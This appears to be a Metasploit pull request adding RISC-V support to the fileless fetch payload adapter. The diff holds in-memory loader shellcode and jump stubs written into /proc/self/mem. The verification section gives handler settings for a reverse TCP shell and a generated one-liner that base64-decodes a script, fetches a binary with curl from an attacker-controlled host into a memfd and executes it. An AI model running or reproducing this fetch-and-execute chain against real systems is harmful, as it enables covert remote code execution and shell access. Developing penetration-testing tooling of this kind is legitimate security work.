### PR TITLE
Add RISC-V fileless fetch payload support

### DIFF
--- a/lib/msf/core/payload/adapter/fetch/fileless.rb
+++ b/lib/msf/core/payload/adapter/fetch/fileless.rb
@@ -138,6 +138,48 @@ module Msf::Payload::Adapter::Fetch::Fileless
           0x0c010101, #0x1020:	syscall	0x40404	0x0c010101
 ]
       payload = in_memory_loader_asm.pack('N*')
+    when 'riscv64le'
+      # fd = memfd_create("")
+      # ftruncate(fd, 0)
+      # pid = getpid()
+      # kill(pid, SIGSTOP)
+      in_memory_loader_asm = [
+        0x00b5c5b3, # xor   a1, a1, a1         # a1 = 0 (flags)
+        0xff010113, # addi  sp, sp, -16        # allocate stack space
+        0x00b13023, # sd    a1, 0(sp)          # store "" on stack
+        0x00010513, # addi  a0, sp, 0          # a0 = &""
+        0x11700893, # addi  a7, x0, 279        # __NR_memfd_create
+        0x00000073, # ecall                    # fd in a0
+        0x02e00893, # addi  a7, x0, 46         # __NR_ftruncate (a1=0)
+        0x00000073, # ecall
+        0x0ac00893, # addi  a7, x0, 172        # __NR_getpid
+        0x00000073, # ecall                    # pid in a0
+        0x01300593, # addi  a1, x0, 19         # SIGSTOP
+        0x08100893, # addi  a7, x0, 129        # __NR_kill
+        0x00000073, # ecall                    # kill(pid, SIGSTOP)
+      ]
+      payload = in_memory_loader_asm.pack('V*')
+    when 'riscv32le'
+      # fd = memfd_create("")
+      # ftruncate(fd, 0)
+      # pid = getpid()
+      # kill(pid, SIGSTOP)
+      in_memory_loader_asm = [
+        0x00b5c5b3, # xor   a1, a1, a1         # a1 = 0 (flags)
+        0xff010113, # addi  sp, sp, -16        # allocate stack space
+        0x00b12023, # sw    a1, 0(sp)          # store "" on stack
+        0x00010513, # addi  a0, sp, 0          # a0 = &""
+        0x11700893, # addi  a7, x0, 279        # __NR_memfd_create
+        0x00000073, # ecall                    # fd in a0
+        0x02e00893, # addi  a7, x0, 46         # __NR_ftruncate (a1=0)
+        0x00000073, # ecall
+        0x0ac00893, # addi  a7, x0, 172        # __NR_getpid
+        0x00000073, # ecall                    # pid in a0
+        0x01300593, # addi  a1, x0, 19         # SIGSTOP
+        0x08100893, # addi  a7, x0, 129        # __NR_kill
+        0x00000073, # ecall                    # kill(pid, SIGSTOP)
+      ]
+      payload = in_memory_loader_asm.pack('V*')
 
     else
       fail_with(Msf::Module::Failure::BadConfig, 'Unsupported architecture')
@@ -204,6 +246,22 @@ module Msf::Payload::Adapter::Fetch::Fileless
     when 'mips64'
       %^"041100000000000001ce7026dfee001001c0000800000000"$(echo $(printf %016x $vdso_addr))^
     
+    # RISC-V 64-bit LE shellcode
+    # auipc t0, 0
+    # ld    t0, 12(t0)
+    # jr    t0
+    # .dword [target address]
+    when 'riscv64le'
+      %^"9702000083b2c20067800200"$(echo $(printf %016x $vdso_addr) | rev | sed -E 's/(.)(.)/\\2\\1/g')^
+
+    # RISC-V 32-bit LE shellcode
+    # auipc t0, 0
+    # lw    t0, 12(t0)
+    # jr    t0
+    # .word [target address]
+    when 'riscv32le'
+      %^"9702000083a2c20067800200"$(echo $(printf %08x $vdso_addr) | rev | sed -E 's/(.)(.)/\\2\\1/g')^
+
     else
       fail_with(Msf::Module::Failure::BadConfig, 'Unsupported architecture')
     end


### PR DESCRIPTION
Add riscv64le and riscv32le architecture support to the fileless fetch payload adapter. This enables in-memory ELF execution via memfd_create on RISC-V Linux targets without writing to disk.

The first-stage shellcode (52 bytes, 13 instructions) performs:
  memfd_create("") -> ftruncate(fd, 0) -> getpid() -> kill(pid, SIGSTOP)

Uses getpid + kill(SIGSTOP) instead of pause, as pause is not available in the asm-generic syscall table used by RISC-V. This matches the existing aarch64 approach.

The jump stub uses auipc + ld/lw + jalr to load and branch to an absolute address embedded after the instruction sequence (20 bytes for rv64, 16 bytes for rv32).

Only RV32I/RV64I base integer instructions are used. The sole difference between the two variants is sd vs sw for the stack store.


## Verification

Set up the handler with a fileless fetch payload:

```
use exploit/multi/handler
set payload cmd/linux/http/riscv64le/shell_reverse_tcp
set FETCH_FILELESS shell
set FETCH_SRVHOST <attacker_ip>
set FETCH_SRVPORT 8080
set LHOST <attacker_ip>
set LHOST 4444
exploit -j
```

Generate fetch command:

```
$ ./msfvenom -p cmd/linux/http/riscv64le/shell_reverse_tcp  LHOST=192.168.200.204 LPORT=4444 FETCH_FILELESS=shell   FETCH_SRVHOST=192.168.200.204   FETCH_SRVPORT=8080   -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 1269 bytes
echo -n 'd3JpdGVieXRlcyAoKSB7IHByaW50ZiBcXCUwM28gIiRAIiA7IH07dmRzb19hZGRyPSQoKDB4JChncmVwIC1GICJbdmRzb10iIC9wcm9jLyQkL21hcHMgfCBjdXQgLWQnLScgLWYxKSkpO2ptcD0iOTcwMjAwMDA4M2IyYzIwMDY3ODAwMjAwIiQoZWNobyAkKHByaW50ZiAlMDE2eCAkdmRzb19hZGRyKSB8IHJldiB8IHNlZCAtRSAncy8oLikoLikvXDJcMS9nJyk7c2M9J2IzYzViNTAwMTMwMTAxZmYyMzMwYjEwMDEzMDUwMTAwOTMwODcwMTE3MzAwMDAwMDkzMDhlMDAyNzMwMDAwMDA5MzA4YzAwYTczMDAwMDAwOTMwNTMwMDE5MzA4MTAwODczMDAwMDAwJztyZWFkIHN5c2NhbGxfaW5mbyA8IC9wcm9jL3NlbGYvc3lzY2FsbDthZGRyPSQoKCQoZWNobyAkc3lzY2FsbF9pbmZvIHwgY3V0IC1kJyAnIC1mOSkpKTtleGVjIDM+L3Byb2Mvc2VsZi9tZW07ZGQgYnM9MSBza2lwPSR2ZHNvX2FkZHIgPCYzID4vZGV2L251bGwgMj4mMTtwcmludGYgIiQod3JpdGVieXRlcyBgcHJpbnRmICRzYyB8IHNlZCAncy8uXHsyXH0vMHgmIC9nJ2ApIiA+JjM7ZXhlYyAzPiYtO2V4ZWMgMz4vcHJvYy9zZWxmL21lbTtkZCBicz0xIHNraXA9JGFkZHIgPCYzID4vZGV2L251bGwgMj4mMTtwcmludGYgIiQod3JpdGVieXRlcyBgcHJpbnRmICRqbXAgfCBzZWQgJ3MvLlx7Mlx9LzB4JiAvZydgKSIgPiYzOw==' | base64 -d | ${SHELL} & cd /proc/$!;og_process=$!;sleep 2;FOUND=0;if [ $FOUND -eq 0 ];then for f in $(find ./fd -type l -perm u=rwx 2>/dev/null);do if [ $(ls -al $f | grep -o "memfd" >/dev/null; echo $?) -eq "0" ];then if $(curl -so $f http://192.168.200.204:8080/T3YFLXrRikpBv2lrBzuXXA >/dev/null);then $f & FOUND=1;break;fi;fi;done;fi;sleep 2;kill -9 $og_process;
```

Run the generated command on a RISC-V system. You should get a session.
